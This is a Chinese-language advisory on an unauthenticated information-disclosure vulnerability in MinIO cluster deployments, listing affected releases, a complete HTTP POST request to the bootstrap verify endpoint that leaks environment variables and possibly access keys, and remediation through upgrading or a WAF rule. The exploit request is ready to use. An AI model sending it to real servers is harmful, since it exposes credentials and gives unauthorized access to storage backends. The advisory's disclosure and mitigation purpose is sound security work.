漏洞说明

MinIO verify接口(未授权问题)存在敏感信息泄漏漏洞,攻击者通过构造特殊URL地址,读取系统敏感信息,其中包括环境变量,有的服务器还会获取到AK/SK,获取后可直接登录后台。此漏洞影响集群节点,单节点不受影响 。

影响版本

  • RELEASE.2019-12-17T23-16-33Z <= MinIo < RELEASE.2023-03-20T20-16-18Z

漏洞复现

payload:

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: ip:9000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

WX20230326-214218@2x.png

修复建议

1、升级到安全版本RELEASE.2023-03-20T20-16-18Z,下载链接:
https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z
2、临时修复方案,在waf上配置策略,拒绝所有post到/minio/bootstrap/v1/verify的请求。